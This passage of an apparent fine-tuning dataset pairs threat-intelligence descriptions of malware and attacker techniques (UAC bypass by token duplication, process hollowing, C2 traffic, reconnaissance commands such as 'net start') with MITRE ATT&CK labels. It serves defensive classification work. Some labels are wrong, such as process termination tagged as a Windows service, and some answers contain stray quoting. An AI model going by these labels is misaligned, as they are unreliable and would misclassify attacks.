MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actor has used this method on its 2019 campaign as well. This UAC bypass starts by executing wusa.exe using ShellExecuteExw and gets its access token using NtOpenProcessToken. Then the access token of wusa.exe is duplicated using NtDuplicatetoken. The DesiredAccess parameter of this function specifies the requested access right for the new token. In this case the actor passed TOKEN_ALL_ACCESS as DesiredAccess value which indicates that the new token has the combination of all access rights of this current token. The duplicated token is then passed to ImpersonateLoggedOnUser and then a cmd instance is spawned using CreateProcessWithLogomW. At the end the duplicated token is assigned to the created thread using NtSetINformationThread to make it elevated" }, { "role": "assistant", "content": "T1134.002 - Create Process with Token" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In addition to these malware families, GALLIUM has been observed employing SoftEther VPN software to facilitate access and maintain persistence to a target network. By installing SoftEther on internal systems, GALLIUM is able to connect through that system as though they are on the internal network of the target. SoftEther provides GALLIUM with another means of persistence and flexibility with the added benefit that its traffic may appear to be benign on the target network" }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbon establishes persistence by creating a service and naming it based off the operating system version running on the current machine." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The final part of the VBA script changes the properties of these two files, setting their attributes to Hidden" }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Elise encrypts several of its files, including configuration files." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Additionally, a small number of campaigns over this same period also made use of various file-sharing platforms like Dropbox for hosting the malicious documents rather than directly attaching them to the messages themselves.Figure 2: Example malicious Excel documentSimilar to the technique described in our previous blog about Remcos, the contents of the documents have been intentionally made to appear as if they are blurry, with the user being prompted to enable editing to have a clearer view of the contents" }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackMould can send commands to C2 in the body of HTTP POST requests." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Night Dragon has used HTTP for C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Anchor has used cmd.exe to run its self deletion routine." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the ‘-p’ parameter has been passed into the command line, the loader proceeds to download the Team9 backdoor directly from the command and control server. One notable addition is the process injection (hollow process injection) when the backdoor has been successfully downloaded and decrypted. The loader injects the backdoor to one of the following processes" }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing', 'T1055.013 - Process Doppelgänging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CopyKittens uses rundll32 to load various tools on victims, including a lateral movement tool named Vminst, Cobalt Strike, and shellcode." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses the Camellia cipher to encrypt communications." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Revenge RAT uses mshta.exe to run malicious scripts on the system." }, { "role": "assistant", "content": "T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It will then spawn a suspended instance of msiexec.exe in a new process. The malware proceeds to load code from the ‘aclmain.sdb’ file and performs process hollowing against this instance of msiexec.exe prior to resuming the process" }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In mid-2018, OceanLotus carried out a campaign using documents abusing the weakness exposed by the CVE-2017-11882 vulnerability. One of the malicious documents used by OceanLotus was analysed by 360 Threat Intelligence Center (in Chinese) and includes details about the exploit. Let’s take a look at a similar document" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to get text of the current foreground window." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bumblebee can send collected data in JSON format to C2." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Once the host-based enumeration information was obtained, it was base64-encoded and then appended to the URL post request to a C2, whereas in previous versions this information was written to a text file." }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dridex has encrypted traffic with RC4." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Targets are approached with spearphishing emails that contain a link to a ZIP file hosted on Google Drive. That archive contains several LNK (aka shortcut) files that extract and execute a malicious JavaScript component, while displaying a decoy document" }, { "role": "assistant", "content": "T1204.001 - Malicious Link', 'T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay can scan for removable media which may contain documents for collection." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Receive a file path from the C2 for a file to read. The target file is read and then split into smaller files named \"<target_filename>.part_<part_number>\" and stored on disk. This capability can be used to break large files of interest into smaller chunks to prepare them for exfiltration" }, { "role": "assistant", "content": "T1030 - Data Transfer Size Limits" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can identify administrator accounts on an infected host." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mythic can leverage a peer-to-peer C2 profile between agents." }, { "role": "assistant", "content": "T1090.001 - Proxy: Internal Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first action performed by the crypter code is to check some specific registry key. If the key is not detected, the crypter will enter an infinite loop or exit, thus it is used as an anti-analysis technique" }, { "role": "assistant", "content": "T1012 - Query Registry', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MegaCortex has used \".cmd\" scripts on the victim's system." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chimera has used \"netstat -ano | findstr EST\" to discover network connections." }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Returns the screenshot to the C2 via:
111 startTakeScreenShot Creates a thread to take a screenshot at a set interval (default: every 10 seconds)" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has compromised domains to use for C2." }, { "role": "assistant", "content": "T1584.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can terminate a specific process by its process id." }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "checks if a value exists within a Registry key in the HKCU hive whose name is the same as the scheduled task it has created." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a built-in module for port scanning." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Avaddon has used the Windows Crypto API to generate an AES key." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shamoon accesses network share(s), enables share access to the target device, copies an executable payload to the target system, and uses a Scheduled Task/Job to execute the malware." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pysa has executed a malicious executable by naming it svchost.exe." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "executes functions using rundll32.exe." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses the Microsoft utility to list processes running on systems." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The decrypted result is saved as “%APPDATA%\\\\Microsoft\\Windows\\Cookies.exe” (T1001) 6) If the file size of “%APPDATA%\\\\Microsoft\\Windows\\Cookies.exe” exceeds 4,485 bytes, it is executed" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Goopy has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2." }, { "role": "assistant", "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic', 'T1071.003 - Mail Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used various forms of spearphishing attempting to get a user to open attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Other functionalities provided by this section of the PowerShell Script are as follows: Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables: IP Address from Network Adapter Configuration OS Name OS Architecture Computer Name Computer Domain Name Username All of this data is concatenated and formatted as shown in Figure 13: Figure 13: Concatenated and formatted data retrieved by PowerShell script Register the victim’s machine to the C2 server by sending the REGISTER command to the server" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37 has a Bluetooth device harvester, which uses Windows Bluetooth APIs to find information on connected Bluetooth devices." }, { "role": "assistant", "content": "T1120 - Peripheral Device Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Emotet has relied upon users clicking on a malicious attachment delivered through spearphishing." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XAgentOSX contains the getInfoOSX function to return the OS X version as well as the current user." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can dump credentials." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerSploit reflectively loads a Windows PE file into a process." }, { "role": "assistant", "content": "T1620 - Reflective Code Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TEMP.Veles used timestomping to modify the $STANDARD_INFORMATION attribute on tools." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Network Reconnaissance – gathering information from machines on the network. Credential Theft – stealing user names and passwords, potentially to provide them with further access to the victim network. RAR archiving – files are transferred to staging servers before exfiltration. Csvde – can be used to extract Active Directory files and data. WMIExec – can be used for lateral movement and to execute commands remotely. PowerShell - a powerful interactive command-line interface and scripting environment included in the Windows operating system" }, { "role": "assistant", "content": "T1074.002 - Remote Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet uses HTTP to communicate with a command and control server." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang performs service discovery using \"net start\" commands." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OLDBAIT collects credentials from several email clients." }, { "role": "assistant", "content": "T1555 - Credentials from Password Stores" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mori can read data from the Registry including from `HKLM\\Software\\NFC\\IPA` and\n`HKLM\\Software\\NFC\\`." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 was able to get SUNBURST signed by SolarWinds code signing certificates by injecting the malware into the SolarWinds Orion software lifecycle." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Threat Group-3390 has deleted existing logs and exfiltrated file archives from a victim." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FIN4 has captured credentials via fake Outlook Web App (OWA) login pages and has also used a .NET based keylogger." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OwaAuth is a web shell that is installed as an ISAPI filter on Exchange servers and shares characteristics with the ChinaChopper web shell. In addition to acting as a web shell, the malware captures and DES-encrypts credentials before writing the username and password to disk. The OwaAuth web shell enables a threat actor to upload and download files, launch processes, and execute SQL queries" }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging', 'T1505.003 - Server Software Component: Web Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Carbon uses the command \"net time \\\\127.0.0.1\" to get information the system’s time." }, { "role": "assistant", "content": "T1124 - System Time Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The installer looks legitimate and has a valid digital signature from Sectigo (Obtain Capabilities: Digital Certificates [T1588.004]). The signature was signed with a code signing certificate purchased by the same user as the SSL certificate for jmttrading[.]org (Obtain Capabilities: Code Signing Certificates [T1588.003]). The MSI Installer asks the victim for administrative privileges to run (User Execution: Malicious File [T1204.002" }, { "role": "assistant", "content": "T1588.004 - Digital Certificates" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QuietSieve can use HTTPS in C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After initial installation, Raindrop runs a computation to delay execution." }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, and CVE-2015-1641." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lucifer can check for specific usernames, computer names, device drivers, DLL's, and virtual devices associated with sandboxed environments and can enter an infinite loop and stop itself if any are detected." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BendyBear can query the host's Registry key at \"HKEY_CURRENT_USER\\Console\\QuickEdit\" to retrieve data." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "On the other hand, FIN7 takes advantage of Mshta, a utility that can execute VBScript, and scheduled tasks to run malicious code on user systems." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task', 'T1053 - Scheduled Task/Job', 'T1218.005 - Signed Binary Proxy Execution: Mshta" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SMOKEDHAM has used \"net.exe user\" and \"net.exe users\" to enumerate local accounts on a compromised host." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For example, the following sample loads the malware as shellcode within a .NET Framework project using msbuild.exe, effectively bypassing application allowlisting techniques" }, { "role": "assistant", "content": "T1127.001 - Trusted Developer Utilities Proxy Execution: MSBuild" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "at can be used to schedule a task on a system to be executed at a specific date or time." }, { "role": "assistant", "content": "T1053.002 - Scheduled Task/Job: At" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mustang Panda has sent malicious files requiring direct victim interaction to execute." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Get-ProcessTokenGroup Privesc-PowerUp module can enumerate all SIDs associated with its current token." }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Epic uses the \"rem reg query\" command to obtain values from Registry keys." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "One archive sample analyzed by CTU researchers contained a legitimate PDF file, a benign image of interest to targets (see Figure 8), and an HttpBrowser installer disguised as an image file" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UNC2452 staged data and files in password-protected archives on a victim's OWA server." }, { "role": "assistant", "content": "T1074.002 - Remote Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Indrik Spider has used PsExec to stop services prior to the execution of ransomware." }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CrackMapExec can gather the user accounts within domain groups." }, { "role": "assistant", "content": "T1069.002 - Permission Groups Discovery: Domain Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This system configuration file (in.sys) will drop a backdoor installer (UserInstall.exe) then delete itself" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT-C-36 has used port 4050 for C2 communications." }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims." }, { "role": "assistant", "content": "T1048 - Exfiltration Over Alternative Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The VBScript also uploads the output of the provided batch scripts to the command and control (C2) server, which provides threat actors a functional remote shell to the system" }, { "role": "assistant", "content": "T1119 - Automated Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Micropsia can perform a recursive directory listing for all volume drives available on the victim's machine and can also fetch specific files by their paths." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "stores information gathered from the endpoint in a file named 1.hwp." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "launches a script to delete their original decoy file to cover tracks." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "actors used the following command following exploitation of a machine with malware to obtain information about services: net start >> %temp%\\download" }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conficker variants used the Windows AUTORUN feature to spread through USB propagation." }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The phishing messages were found to contain a Microsoft Word document attachment that uses VBA macros to install LookBack malware. When the attachment is executed, the malicious VBA macro within the Microsoft Word attachment drops three Privacy Enhanced Mail (PEM) files to the host: tempgup.txt, tempgup2.txt, and tempsodom.txt. Additionally, the file Temptcm.tmp, which is a version of certutil.exe, is dropped to decode the PEM files using Temptcm.tmp. The macro next creates a copy of the decoded PEM files restoring their proper file extensions with the Windows essentuti.exe. Finally, the macro launches GUP.exe and the libcurl.dll loader separately, resulting in the execution of LookBack malware" }, { 